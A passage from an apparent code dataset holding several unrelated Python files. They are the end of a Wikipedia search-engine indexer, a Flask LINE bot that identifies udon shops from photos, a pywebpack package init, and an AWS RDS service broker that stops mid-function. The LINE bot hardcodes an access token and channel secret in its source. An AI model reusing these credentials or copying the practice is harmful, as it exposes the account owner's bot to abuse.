time.time() - start_time)\n start_time = time.time()\n straight_index = read_straight_index(straight_index_file_name)\n print('straight read:', time.time() - start_time)\n start_time = time.time()\n for key in dictionary:\n number_ids, offset = dictionary[key]\n read_page_ids(inverse_index_file_name, offset, number_ids)\n print('inverse read:', time.time() - start_time)\n start_time = time.time()\n for key in dictionary:\n number_ids, offset = dictionary[key]\n page_ids = read_page_ids(inverse_index_file_name, offset, number_ids)\n for id, offset_coord in page_ids:\n read_coordinates(coordinate_index_file_name, offset_coord)\n print('all terms coordinate read:', time.time() - start_time)\n\n token_file = open(token_file_name, 'r', encoding='utf-8')\n freq = dict()\n\n number_terms = 0\n for line in token_file:\n for token in line.split():\n if token.startswith(PAGE_TOKEN_PREFIX):\n continue\n number_terms += 1\n term = token.lower()\n\n if term not in freq:\n freq[term] = 1\n else:\n freq[term] += 1\n token_file.close()\n\n data = []\n for term in freq.keys():\n freq[term] /= number_terms\n data.append([term, freq[term]])\n\n number_terms_test = 1000\n\n data.sort(key=lambda a: a[1])\n\n start_time = time.time()\n for term, _ in data[0:number_terms_test]:\n number_ids, offset = dictionary[hash_used(term)]\n page_ids = read_page_ids(inverse_index_file_name, offset, number_ids)\n for id, offset_coord in page_ids:\n read_coordinates(coordinate_index_file_name, offset_coord)\n print('low freq terms coordinate read:', time.time() - start_time)\n\n start_time = time.time()\n for term, _ in data[(len(data) - number_terms_test) // 2:(len(data) + number_terms_test) // 2]:\n number_ids, offset = dictionary[hash_used(term)]\n page_ids = read_page_ids(inverse_index_file_name, offset, number_ids)\n for id, offset_coord in page_ids:\n read_coordinates(coordinate_index_file_name, offset_coord)\n print('middle freq terms 
coordinate read:', time.time() - start_time)\n\n start_time = time.time()\n for term, _ in data[-number_terms_test:]:\n number_ids, offset = dictionary[hash_used(term)]\n page_ids = read_page_ids(inverse_index_file_name, offset, number_ids)\n for id, offset_coord in page_ids:\n read_coordinates(coordinate_index_file_name, offset_coord)\n print('high freq terms coordinate read:', time.time() - start_time)\n\n\nclass Simple9Schemes:\n SCHEME_1 = [0, 1, 28]\n SCHEME_2 = [1, 2, 14]\n SCHEME_3 = [2, 3, 9]\n SCHEME_4 = [3, 4, 7]\n SCHEME_5 = [4, 5, 5]\n SCHEME_6 = [5, 7, 4]\n SCHEME_7 = [6, 9, 3]\n SCHEME_8 = [7, 14, 2]\n SCHEME_9 = [8, 28, 1]\n ALL_SCHEMES = [SCHEME_9, SCHEME_8, SCHEME_7, SCHEME_6, SCHEME_5, SCHEME_4, SCHEME_3, SCHEME_2, SCHEME_1]\n\n\ndef simple9_encode(sequence, jump_table_info_need=False):\n result = bytearray()\n n = len(sequence)\n i = 0\n jump_table_info = []\n used_byte_counter = 0\n while i < n:\n for scheme in Simple9Schemes.ALL_SCHEMES:\n code, number_elements, bit_length = scheme\n if i + (number_elements - 1) >= n:\n continue\n ok = True\n for j in range(number_elements):\n if sequence[i+j] > 2**bit_length - 1:\n ok = False\n break\n\n if ok:\n data = code\n data <<= (28-number_elements*bit_length)\n for j in range(number_elements):\n data <<= bit_length\n data |= sequence[i+j]\n\n if jump_table_info_need and used_byte_counter > 0 and used_byte_counter % JUMP_TABLE_SPACE_BYTES == 0:\n jump_table_info.append([i, used_byte_counter])\n\n result.extend(data.to_bytes(4, 'big'))\n used_byte_counter += 4\n i += number_elements\n\n if jump_table_info_need:\n return result, jump_table_info\n\n return result\n\n\ndef simple9_decode(data):\n result = []\n i = 0\n n = len(data)\n while i < n:\n buffer = int.from_bytes(data[i:i+4], 'big', signed=False)\n code = (buffer >> 28)\n _, number_elements, bit_length = Simple9Schemes.ALL_SCHEMES[-(code+1)]\n mask = (1 << bit_length)-1\n numbers = [0] * number_elements\n for j in range(number_elements):\n numbers[number_elements-(j+1)] = (buffer & mask)\n buffer >>= bit_length\n result.extend(numbers)\n i += 4\n\n return result\n\n\nclass Simple9Test(unittest.TestCase):\n\n def test01_encode_decode_equal_data(self):\n data = []\n length_data = 1000000\n max_number = 100\n\n for _ in range(length_data):\n data.append(random.randint(1, max_number))\n\n self.assertListEqual(simple9_decode(simple9_encode(data)), data)\n\n\ndef read_jump_table(jump_table_file_name, offset):\n data = open(jump_table_file_name, 'rb')\n data.seek(offset)\n\n first_page_id, compressed_page_ids_length = struct.unpack('ii', data.read(2*INTEGER_LENGTH))\n page_ids_difference = simple9_decode(data.read(compressed_page_ids_length))\n first_offset, compressed_coordinate_offset_length = struct.unpack('ii', data.read(2*INTEGER_LENGTH))\n offset_difference = simple9_decode(data.read(compressed_coordinate_offset_length))\n result = [[first_page_id, first_offset]]\n\n for page_id_diff, offset_diff in list(zip(page_ids_difference, offset_difference)):\n result.append([result[-1][0]+page_id_diff, result[-1][1]+offset_diff])\n\n data.close()\n\n return result\n\n\ndef read_first_page_id_and_length_compress_data(inverse_index_file_name, offset):\n data = open(inverse_index_file_name, 'rb')\n data.seek(offset)\n\n first_page_id, length_compress_data = struct.unpack('ii', data.read(INTEGER_LENGTH*2))\n\n data.close()\n\n return first_page_id, length_compress_data\n\n\ndef read_block_page_ids(jump_table, block_id, inverse_index_file_name, offset_inverse_index):\n data = 
open(inverse_index_file_name, 'rb')\n result = []\n\n first_page_id, length_compress_data = read_first_page_id_and_length_compress_data(inverse_index_file_name,\n offset_inverse_index)\n\n if block_id == -1:\n result.append(first_page_id)\n offset_inverse_index += INTEGER_LENGTH * 2\n\n data.seek(offset_inverse_index)\n differences_page_ids = simple9_decode(data.read(JUMP_TABLE_SPACE_BYTES))\n\n for page_id_diff in differences_page_ids:\n result.append(result[-1]+page_id_diff)\n # print('jump table:', jump_table)\n # print('first block:', len(result))\n # print('fist 50 elem:', result[0:50])\n # print('last 50 elem:', result[len(result)-50:])\n else:\n block_first_page_id, block_offset_inverse_index = jump_table[block_id]\n result.append(block_first_page_id)\n\n data.seek(block_offset_inverse_index)\n differences_page_ids = []\n if block_id == len(jump_table) - 1:\n # print('length_compress_data=', length_compress_data)\n # print('read len data:', length_compress_data - JUMP_TABLE_SPACE_BYTES * (block_id+1))\n differences_page_ids = simple9_decode(data.read(length_compress_data - JUMP_TABLE_SPACE_BYTES * (block_id + 1)))[1:]\n else:\n differences_page_ids = simple9_decode(data.read(JUMP_TABLE_SPACE_BYTES))[1:]\n\n for page_id_diff in differences_page_ids:\n result.append(result[-1]+page_id_diff)\n\n data.close()\n\n return result\n\n\ndef remove_rus_ending(word):\n rus_endings_verb = ['ать', 'ять', 'оть', 'еть', 'уть', 'у', 'ю', 'ем', 'им', 'ешь', 'ишь', 'ете', 'ите', 'ет',\n 'ит', 'ут', 'ют', 'ят', 'ал', 'ял', 'ала', 'яла', 'али', 'яли', 'ол', 'ел', 'ола', 'ела',\n 'оли', 'ели', 'ул', 'ула', 'ули']\n rus_endings_name = ['а', 'я', 'о', 'е', 'ь', 'ы', 'и', 'а', 'ая', 'яя', 'ое', 'ее', 'ой', 'ые', 'ие', 'ый', 'йй']\n rus_endings_flex = ['а', 'ам', 'ами', 'ас', 'ам', 'ax', 'ая', 'е', 'её', 'ей', 'ем', 'еми', 'емя', 'ex', 'ею',\n 'ёт', 'ёте', 'ёх', 'ёшь', 'и', 'ие', 'ий', 'им', 'ими', 'ит', 'ите', 'их', 'ишь', 'ию', 'м',\n 'ми', 'мя', 'о', 'ов', 'ого', 'ое', 'оё', 'ой', 'ом', 'ому', 'ою', 'см', 'у', 'ум',\n 'умя', 'ут', 'ух', 'ую', 'шь']\n\n rus_endings = []\n rus_endings.extend(rus_endings_verb)\n rus_endings.extend(rus_endings_name)\n rus_endings.extend(rus_endings_flex)\n\n valid_endings = []\n for ending in rus_endings:\n if word.endswith(ending) and len(word) > len(ending):\n valid_endings.append(ending)\n\n index_ending = -1\n max_length = -1\n for i in range(len(valid_endings)):\n if max_length < len(valid_endings[i]):\n max_length = len(valid_endings[i])\n index_ending = i\n\n if index_ending == -1:\n return word\n\n return word[0:len(word)-len(valid_endings[index_ending])]\n\n\ndef read_page_by_id(token_file_name, straight_index, page_id):\n token_file = open(token_file_name, 'r', encoding='utf-8')\n\n token_file.seek(straight_index[page_id][2])\n\n result = []\n for line in token_file:\n if line.startswith(PAGE_TOKEN_PREFIX):\n break\n result.extend(line.split())\n\n return result\n\n\ndef collocation_search(token_file_name):\n token_file = open(token_file_name, 'r', encoding='utf-8')\n student_out = open('../student_out.txt', 'w', encoding='utf-8')\n mle_out = open('../mle_out.txt', 'w', encoding='utf-8')\n\n unogramm_freq = dict()\n bigramm_freq = dict()\n last_token = ''\n token_number = 0\n for line in token_file:\n if line.startswith(PAGE_TOKEN_PREFIX):\n continue\n for token in line.lower().split():\n if len(token) < 3:\n continue\n if token in ['http', 'www', 'url', 'https', 'ref', 'br', 'html',\n 'en', 'lang', 'org', 'com', 'web', 'примечания', 'автор', 'deadurl', 
'archiveurl',\n 'archivedate', 'accessdate', 'категория']:\n continue\n\n token_number += 1\n if token not in unogramm_freq.keys():\n unogramm_freq[token] = 1\n else:\n unogramm_freq[token] += 1\n\n if last_token != '':\n bigramm = last_token+' '+token\n if bigramm not in bigramm_freq.keys():\n bigramm_freq[bigramm] = 1\n else:\n bigramm_freq[bigramm] += 1\n\n last_token = token\n\n student_data = []\n for bigramm in bigramm_freq.keys():\n first, second = bigramm.split()\n p = unogramm_freq[first] * unogramm_freq[second] / token_number**2\n x = bigramm_freq[bigramm] / token_number\n t = (x - p) / math.sqrt(x/token_number)\n\n if t > 2.576:\n continue\n student_data.append([t, bigramm])\n\n mle_data = []\n eps = 1e-12\n for bigramm in bigramm_freq.keys():\n first, second = bigramm.split()\n p = unogramm_freq[second] / token_number\n p_1 = bigramm_freq[bigramm] / unogramm_freq[first]\n p_2 = (unogramm_freq[second] - bigramm_freq[bigramm]) / (token_number - unogramm_freq[first])\n if abs(p) < eps or abs(p_1) < eps or abs(p_2) < eps or abs(1.0-p) < eps or abs(1.0-p_1) < eps or abs(1.0-p_2) < eps:\n continue\n\n def log_l(k, n, x):\n return k * math.log2(x) + (n-k) * math.log2(1.0 - x)\n\n value = log_l(bigramm_freq[bigramm], unogramm_freq[first], p) + \\\n log_l(unogramm_freq[second] - bigramm_freq[bigramm], token_number - unogramm_freq[first], p) - \\\n log_l(bigramm_freq[bigramm], unogramm_freq[first], p_1) - \\\n log_l(unogramm_freq[second] - bigramm_freq[bigramm], token_number - unogramm_freq[first], p_2)\n value *= -2.0\n\n if value > 140.2:\n continue\n mle_data.append([value, bigramm])\n\n student_data.sort(key=lambda a: a[0], reverse=True)\n mle_data.sort(key=lambda a: a[0], reverse=True)\n\n data_length = 30\n for value, bigramm in student_data[0:data_length]:\n student_out.write(bigramm + '\\n')\n for value, bigramm in mle_data[0:data_length]:\n mle_out.write(bigramm + '\\n')\n\n token_file.close()\n student_out.close()\n mle_out.close()\n\n\ndef run():\n xml_file_name = '../Википедия-20190226103515.xml'\n data_file_name = '../data.txt'\n token_file_name = '../tokens.txt'\n assessment_file_name = '../assessment.txt'\n estimate_result_file_name = '../assessment_result.txt'\n dictionary_file_name = '../dictionary.bin'\n inverse_index_file_name = '../inverse_index.bin'\n straight_index_file_name = '../straight_index.bin'\n graph_output_file_name = '../graph_ziph.txt'\n all_page_ids_file_name = '../all_page_ids.bin'\n coordinate_index_file_name = '../coordinate_index.bin'\n jump_table_file_name = '../jump_table.bin'\n inverse_index_title_file_name = '../inverse_title_index.bin'\n coordinate_index_title_file_name = '../coordinate_title_index.bin'\n\n #parse_wiki_xml(xml_file_name, data_file_name)\n #tokenization(data_file_name, token_file_name)\n #print_token_statistic(token_file_name)\n #test_tokenization()\n # estimate(assessment_file_name, estimate_result_file_name)\n #indexation(token_file_name, dictionary_file_name, inverse_index_file_name, straight_index_file_name, coordinate_index_file_name, jump_table_file_name)\n #create_all_page_ids(token_file_name, all_page_ids_file_name)\n #stats_term(token_file_name, index_file_name)\n #test_indexation()\n #stats_frequency_term_and_zipf(token_file_name, graph_output_file_name)\n #unittest.main()\n #stats_coordinates(dictionary_file_name, inverse_index_file_name, coordinate_index_file_name)\n #stat_before_compress_feat(token_file_name, dictionary_file_name, inverse_index_file_name, straight_index_file_name, coordinate_index_file_name)\n 
collocation_search(token_file_name)\n\n # com_args_parser = argparse.ArgumentParser()\n # com_args_parser.add_argument('--interactive-search', '-i', action=\"store_true\", help='search by input requests')\n # com_args_parser.add_argument('--search-request-file', '-s', type=str, help='search by requests in file')\n # com_args_parser.add_argument('--output-file', '-o', type=str, help='output file')\n # my_namespace = com_args_parser.parse_args()\n #\n # dictionary = read_dictionary(dictionary_file_name)\n # straight_index = read_straight_index(straight_index_file_name)\n # all_page_ids = read_all_page_ids(all_page_ids_file_name)\n # all_page_ids_with_stat = read_all_page_ids_with_stat(all_page_ids_file_name)\n #\n # if my_namespace.interactive_search:\n # print('Request: ', end='', flush=True)\n # for request in sys.stdin:\n # start_time = time.time()\n # serp = get_SERP_by_request(request, dictionary, inverse_index_file_name, all_page_ids, straight_index,\n # coordinate_index_file_name, jump_table_file_name, all_page_ids_with_stat,\n # token_file_name, inverse_index_title_file_name, coordinate_index_title_file_name)\n # request_time = time.time() - start_time\n #\n # print('\\n============= SERP time is ' + to_format(request_time, 4) + 's =============\\n', flush=True)\n #\n # if serp is not None:\n # print(serp, flush=True)\n # else:\n # print('Pages is not found.', flush=True)\n # print('Request: ', end='', flush=True)\n # elif my_namespace.search_request_file is not None:\n # if my_namespace.output_file is None:\n # print('Error: no output-file option!')\n # exit(0)\n # try:\n # request_file = open(my_namespace.search_request_file, 'r', encoding='utf-8')\n # output_file = open(my_namespace.output_file, 'w', encoding='utf-8')\n # for request in request_file:\n # #print(request)\n # start_time = time.time()\n # serp = get_SERP_by_request(request, dictionary, inverse_index_file_name, all_page_ids, straight_index,\n # coordinate_index_file_name, jump_table_file_name, all_page_ids_with_stat,\n # token_file_name, inverse_index_title_file_name, coordinate_index_title_file_name)\n # request_time = time.time() - start_time\n # output_file.write('Request: [' + request + ']\\n')\n # output_file.write('============= SERP time is ' + to_format(request_time, 4) + 's =============\\n')\n # if serp is not None:\n # output_file.write(serp)\n # else:\n # output_file.write('Pages is not found.\\n')\n # except IOError:\n # print('Error: Could not open file(s)!')\n # exit(0)\n\n\nif __name__ == \"__main__\":\n run()\n\n\n","sub_path":"python/search_engine.py","file_name":"search_engine.py","file_ext":"py","file_size_in_byte":85418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"504004620","text":"import numpy as np\n\nfrom flask import Flask, request, abort\n\nfrom linebot import (LineBotApi, WebhookHandler)\nfrom linebot.exceptions import (InvalidSignatureError)\nfrom linebot.models import (MessageEvent, TextMessage, TextSendMessage, ImageMessage, ImageSendMessage)\n\n#from keras.models import load_model\n#from keras.preprocessing import image\n\n# TensorFlow cpu == 2.3.1\nimport tensorflow as tf\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.preprocessing import image\n\n#model = load_model(\"efficientnet_No20\")\nmodel = load_model('ResNet_32.h5')\n\nimport pandas as pd\nimport os\n\napp = Flask(__name__)\n\nACCESS_TOKEN = 
\"6SWeij+DVrTEQSBNyP2MxqdYHRuGYNSGtXHB3qwddm6+4JAY4E+qFuquzr29jYObYIWBplN8fQbj7uK7OBVymp/O7gMGjhvEmNyR0q2ii0XhvUYOGxUPZZfE0pWjGxZYw77KF7A9aQSnb50ZHkhajAdB04t89/1O/w1cDnyilFU=\"\nSECRET = \"2af7991203a82a3410e80e864412834a\"\n\n#FQDN = \"https://cats-vs-dogs-line-bot-naoya.herokuapp.com/callback\"\nFQDN = \"https://udon-ai-bot.herokuapp.com/callback\"\n\nline_bot_api = LineBotApi(ACCESS_TOKEN)\nhandler = WebhookHandler(SECRET)\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n signature = request.headers['X-Line-Signature']\n\n body = request.get_data(as_text=True)\n app.logger.info(\"Requestbody: \" + body)\n try:\n handler.handle(body, signature)\n except InvalidSignatureError:\n abort(400)\n\n return'OK'\n\n@handler.add(MessageEvent, message=ImageMessage)\ndef handle_image_message(event):\n message_content = line_bot_api.get_message_content(event.message.id)\n \n # 取得した画像ファイル\n with open(\"data/\"+event.message.id+\".jpg\", \"wb\") as f:\n \n #get_img_text = \"AI判別中です。 \\n少しお待ちください。\"\n #line_bot_api.reply_message(event.reply_token, TextSendMessage(text=get_img_text))\n \n f.write(message_content.content)\n \n\n test_url = \"./data/\"+event.message.id+\".jpg\"\n\n #img = image.load_img(test_url, target_size=(224, 224)) # read image as PIL data\n img = image.load_img(test_url, target_size=(160, 160)) # read image as PIL data\n x = image.img_to_array(img) # convert PIL data to Numpy Array\n x = np.expand_dims(x, axis=0)\n x = x / 255.0\n\n # モデルのロード\n try:\n\n predict = model.predict(x).flatten()\n \"\"\"\n suzaki_score = predict[0]*100\n gamou_score = predict[1]*100\n nagata_score = predict[2]*100\n hinode_score = predict[3]*100\n tamura_score = predict[4]*100\n setobare_score = predict[5]*100\n hayuka_score = predict[6]*100\n ippuku_score = predict[7]*100\n tanigawa_score = predict[8]*100\n mugizou_score = predict[9]*100\n miyoshi_score = predict[10]*100\n ookura_score = predict[11]*100\n yamagoe_score = predict[12]*100\n okasen_score = predict[13]*100\n nakamura_score = predict[14]*100\n yoshiya_score = predict[15]*100\n kamakiri_score = predict[16]*100\n joto_score = predict[17]*100\n nekko_score = predict[18]*100\n yamadaya_score = predict[19]*100\n \"\"\"\n \"\"\"\n classnames = [\"000_suzaki-shokuryohinten_mitoyo\", \"001_gamou_sakaide\",\n \"002_nagata-in-kanoka_zentsuji\",\"003_hinode-seimenjo_sakaide\",\n \"004_tamura_ayagawa\",\"005_setobare_takamatsu\",\n \"006_hayuka_ayagawa\",\"007_ippuku_takamatsu\",\"008_tanigawa-beikokuten_mannou\",\n \"009_mugizou_takamatsu\",\"010_miyoshi-udon_mitoyo\",\"011_ookura_takamatsu\",\n \"012_yamagoe_ayagawa\",\"013_okasen_utazu\",\n \"014_nakamura-udon_marugame\",\"015_yoshiya_marugame\",\n \"016_kamakiri_kanonji\",\"017_joto_kanonji\",\n \"018_nekko_tadotsu\",\"019_yamadaya_takamatsu\"]\n \"\"\"\n\n classnames = [\"須崎食料品店\", \"讃岐うどん がもう\",\n \"釜あげうどん 長田 in 香の香\",\"日の出製麺所\",\n \"手打うどん たむら\",\"おうどん 瀬戸晴れ\",\n \"本格手打うどん はゆか\",\"うどん 一福\",\"谷川米穀店\",\n \"手打うどん 麦蔵\",\"三好うどん\",\"手打ちうどん 大蔵\",\n \"山越うどん\",\"本格手打うどん おか泉\",\n \"中村うどん\",\"純手打うどん よしや\",\n \"カマ喜ri \",\"西端手打 上戸\",\n \"根ッ子うどん\",\"うどん本陣 山田家\"]\n\n index = np.argmax(predict)\n \n udonya_score = predict[index]*100\n \n label = classnames[index]\n\n text = f\"これは「{label}」のうどんです。\\n自信は{udonya_score:.1f}%です。\"\n\n line_bot_api.reply_message(event.reply_token, TextSendMessage(text=text))\n\n except:\n line_bot_api.reply_message(event.reply_token, TextSendMessage(text=\"failed\"))\n\n\n 
#line_bot_api.reply_message(event.reply_token,ImageSendMessage(original_content_url=FQDN+\"/static/\"+event.message.id+\".jpg\",preview_image_url=FQDN+\"/static/\"+event.message.id+\".jpg\"))\n \n\nif __name__ == \"__main__\":\n app.run() \n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"392968502","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of PyWebpack\n# Copyright (C) 2017 CERN.\n#\n# PyWebpack is free software; you can redistribute it and/or modify\n# it under the terms of the Revised BSD License; see LICENSE file for\n# more details.\n\n\"\"\"Webpack integration layer for Python.\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nfrom .bundle import WebpackBundle\nfrom .helpers import bundles_from_entry_point\nfrom .manifests import Manifest, ManifestEntry, ManifestLoader, \\\n WebpackManifestFactory, WebpackYamFactory, WebpackBundleTrackerFactory, \\\n ManifestError, InvalidManifestError, UnfinishedManifestError, \\\n UnsupportedExtensionError, UnsupportedManifestError\nfrom .project import WebpackProject, WebpackTemplateProject, \\\n WebpackBundleProject\nfrom .storage import FileStorage, LinkStorage\nfrom .version import __version__\n\n__all__ = (\n '__version__',\n 'bundles_from_entry_point',\n 'FileStorage',\n 'InvalidManifestError',\n 'LinkStorage',\n 'Manifest',\n 'ManifestEntry',\n 'ManifestError',\n 'ManifestLoader',\n 'UnfinishedManifestError',\n 'UnsupportedExtensionError',\n 'UnsupportedManifestError',\n 'WebpackBundle',\n 'WebpackBundleProject',\n 'WebpackBundleTrackerFactory',\n 'WebpackManifestFactory',\n 'WebpackProject',\n 'WebpackTemplateProject',\n 'WebpackYamFactory',\n)\n","sub_path":"pywebpack/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"344861770","text":"# TODO: Resovle org/space guids to common names and tag instance\nimport os\nimport json\nimport yaml\nimport bottle\nimport random\nimport string\nimport utils\nfrom rds import RDS\nfrom time import sleep\nimport botocore.exceptions\n\n\nX_BROKER_API_VERSION = 2.6\nX_BROKER_API_VERSION_NAME = 'X-Broker-Api-Version'\nCONFIG = None\n\n\ndef init():\n global CONFIG\n with open('config.yml', 'r') as f:\n CONFIG = yaml.load(f.read())\n # This will check to ensure the dynamodb table exists. 
If it does\n # not it will create the table and block until it is usable.\n utils.check_dynamodb(\n table_name=CONFIG['dynamodb_table'], **CONFIG['aws']\n )\n\n\ndef authenticate(username, password):\n if username == CONFIG['basic_auth_user']:\n if password == CONFIG['basic_auth_pass']:\n return True\n else:\n bottle.abort(401, \"Unauthorized\")\n else:\n bottle.abort(401, \"Unauthorized\")\n\n\ndef _redirect_http_to_https(callback):\n \"\"\"Bottle plugin that redirects all http requests to https\"\"\"\n def wrapper(*args, **kwargs):\n scheme = bottle.request.urlparts[0]\n if scheme == 'http':\n # request is http; redirect to https\n bottle.redirect(bottle.request.url.replace('http', 'https', 1))\n else:\n return callback(*args, **kwargs)\n return wrapper\n\n\ndef _abort_async_required():\n # Return 422 and an error if the client does not support async\n # service broker requests.\n bottle.response.content_type = 'application/json'\n bottle.response.status = 422\n msg = json.dumps({\n \"error\": \"AsyncRequired\",\n \"description\": \"This service plan requires client support for \"\n \"asynchronous service operations. Please use \"\n \"the CLI tools to provision this service.\"\n })\n return msg\n\n\n@bottle.error(401)\n@bottle.error(409)\ndef error(error):\n bottle.response.content_type = 'application/json'\n resp = {'error': \"{0}\".format(error.body)}\n return json.dumps(resp)\n\n\n@bottle.route('/v2/catalog', method='GET')\n@bottle.auth_basic(authenticate)\ndef catalog():\n \"\"\"Returns the service catalog to the cloud controller.\n \"\"\"\n # The gorouter seems to strip this (and other) headers out if the\n # service broker is hosted as a Cloud Foundry app. You can enable\n # this header check (as per the API spec) if the app is not hosted\n # in Cloud Foundry by setting the `hosted_in_cloud_foundry` option\n # in the config file to false. The default value is true.\n cf_app = CONFIG.get('hosted_in_cloud_foundry', True)\n if cf_app is not True:\n api_version = bottle.request.headers.get('X-Broker-Api-Version', 2.6)\n if not api_version or float(api_version) < X_BROKER_API_VERSION:\n msg = (\"Missing or incompatible {0}. 
Expecting version {1} or \"\n \"later\".format(X_BROKER_API_VERSION_NAME,\n X_BROKER_API_VERSION))\n bottle.abort(409, msg)\n bottle.response.content_type = 'application/json'\n return json.dumps({'services': CONFIG['services']})\n\n\n@bottle.route('/v2/service_instances/', method='PUT')\n@bottle.auth_basic(authenticate)\ndef provision(instance_id):\n \"\"\"Provisions an RDS instance.\n \"\"\"\n # TODO: Break this up into more maintainable chunks.\n if bottle.request.content_type != 'application/json':\n bottle.abort(\n 415,\n 'Unsupported Content-Type: expecting application/json'\n )\n incompletes = bottle.request.query.getone('accepts_incomplete')\n bottle.response.content_type = 'application/json'\n if incompletes is None:\n return _abort_async_required()\n if incompletes.lower() == 'true':\n data = json.loads(bottle.request.body.read())\n for plan in CONFIG['plan_settings']:\n if plan['id'] == data['plan_id']:\n plan_params = dict(plan)\n # Remove the id value from the params so we can just\n # pass the whole dict along to the RDS class.\n del plan_params['id']\n break\n else:\n bottle.response.status = 400\n return json.dumps({'description': 'Plan ID does not exist'})\n rds = RDS(**CONFIG['aws'])\n # Update the rds class instance with the parameters for the\n # plan as defined in the configuration.\n rds.__dict__.update(plan_params)\n # Parse and use extra parameters that have been passed in by\n # the user.\n #\n # TODO: Move allowed_params to config so operator can determine\n # what they want to allow.\n allowed_params = ['DBName', 'AllocatedStorage']\n if CONFIG['deploy_from_snapshots'] is True:\n allowed_params.append('DBSnapshotIdentifier')\n if 'parameters' in data.keys():\n user_params = dict([\n (k, v) for (k, v) in data['parameters'].items()\n if k in allowed_params\n ])\n rds.__dict__.update(user_params)\n else:\n user_params = {}\n params_to_update = {}\n rds.DBInstanceIdentifier = '-'.join([rds.Engine.lower(), instance_id])\n rds.MasterUserPassword = utils.random_string()\n if rds.DBSnapshotIdentifier is None:\n last_operation = 'create'\n source_snapshot = 'NONE'\n step = 'NONE'\n first_char = random.choice(string.letters)\n rds.MasterUsername = ''.join([\n first_char,\n utils.random_string(15)\n ])\n rds.create_instance()\n else:\n last_operation = 'create_from_snapshot'\n source_snapshot = rds.DBSnapshotIdentifier\n step = 'deploy'\n try:\n snapshot_metadata = rds.snapshot_metadata()\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'DBSnapshotNotFound':\n bottle.response.status = 400\n return json.dumps(\n {'description': 'Invalid snapshot identifier'}\n )\n else:\n raise\n if snapshot_metadata['Engine'] != rds.Engine.lower():\n bottle.response.status = 400\n return json.dumps(\n {'description': 'Database engine in snapshot differs from '\n 'database engine in plan settings.'}\n )\n rds.MasterUsername = snapshot_metadata['MasterUsername']\n rds.Port = snapshot_metadata['Port']\n # If the user is requesting a bigger disk than the snapshot\n # was generated from store this parameter so we can change\n # it during the modify operation after initial provisioning.\n if rds.AllocatedStorage > snapshot_metadata['AllocatedStorage']:\n params_to_update['AllocatedStorage'] = rds.AllocatedStorage\n if rds.StorageType != snapshot_metadata['StorageType']:\n params_to_update['StorageType']\n # When deploying from snapshot the security groups is always\n # set to the default security group. 
The only way to change\n # it is to modify the instance after provisioning is done.\n # If the security group IDs are provided then they take\n # precedence over the named security groups. If named\n # groups are provided they will be validated now before the\n # instance is created and stored to be applied after the\n # instance is done with initial bootstrapping.\n if rds.VpcSecurityGroupIds:\n params_to_update['VpcSecurityGroupIds'] = rds.VpcSecurityGroupIds\n else:\n group_ids = rds.validate_security_groups()\n if group_ids[0]:\n params_to_update['VpcSecurityGroupIds'] = group_ids[1]\n else:\n bottle.response.status = 400\n return json.dumps(\n {'description': 'Invalid AWS security group id'}\n )\n rds.create_from_snapshot()\n iv = utils.Crypt.generate_iv()\n credentials = {\n 'username': rds.MasterUsername,\n 'password': rds.MasterUserPassword,\n 'hostname': '',\n 'port': rds.Port,\n 'db_name': rds.DBName,\n 'uri': '',\n }\n with utils.Crypt(iv=iv, key=CONFIG['encryption_key']) as c:\n creds = c.encrypt(json.dumps(credentials))\n dynamodb = utils.boto3_session(**CONFIG['aws']).resource('dynamodb')\n table = dynamodb.Table(name=CONFIG['dynamodb_table'])\n record = {\n 'instance_id': instance_id,\n 'iv': iv,\n 'hostname': rds.DBInstanceIdentifier,\n 'credentials': creds,\n 'engine': rds.Engine,\n 'binding_ids': [],\n 'parameters': user_params,\n 'last_operation': last_operation,\n 'source_snapshot': source_snapshot,\n 'step': step,\n 'params_to_update': params_to_update\n }\n record.update(data)\n table.put_item(Item=record)\n else:\n return _abort_async_required()\n bottle.response.status = 202\n return json.dumps({\"dashboard_url\": \"\"})\n\n\n@bottle.route('/v2/service_instances/', method='PATCH')\n@bottle.auth_basic(authenticate)\ndef update(instance_id):\n updateable_params = ('AllocatedStorage',)\n incompletes = bottle.request.query.getone('accepts_incomplete')\n bottle.response.content_type = 'application/json'\n if incompletes is None:\n return _abort_async_required()\n data = json.loads(bottle.request.body.read())\n for param in data['parameters'].keys():\n if param not in updateable_params:\n bottle.response.status = 400\n msg = 'Updating of {0} is not supported'.format(param)\n return json.dumps({'description': msg})\n dynamodb = utils.boto3_session(**CONFIG['aws']).resource('dynamodb')\n table = dynamodb.Table(name=CONFIG['dynamodb_table'])\n record = table.get_item(Key={'instance_id': instance_id})\n if 'Item' not in record.keys():\n bottle.response.status = 410\n return json.dumps({})\n else:\n record = record.pop('Item')\n rds = RDS(DBInstanceIdentifier=record['hostname'], **CONFIG['aws'])\n details = rds.db_instance_details()\n if data['parameters']['AllocatedStorage'] <= details['AllocatedStorage']:\n bottle.response.status = 400\n return json.dumps({\n 'description': 'Decreasing AllocatedStorage is not supported.'\n })\n rds.update_instance(\n DBInstanceIdentifier=record['hostname'],\n **data['parameters']\n )\n for i in xrange(0,10):\n details = rds.db_instance_details()\n if details['DBInstanceStatus'] != 'available':\n break\n sleep(5)\n else:\n bottle.response.status = 408\n return json.dumps({})\n record['last_operation'] = 'update'\n record['parameters'] = data['parameters']\n table.put_item(Item=record)\n bottle.response.status = 202\n return json.dumps({})\n\n\n@bottle.route('/v2/service_instances/', method='DELETE')\n@bottle.auth_basic(authenticate)\ndef deprovision(instance_id):\n \"\"\"Destroys an RDS instance.\n \"\"\"\n # The deprovision endpoint supports 
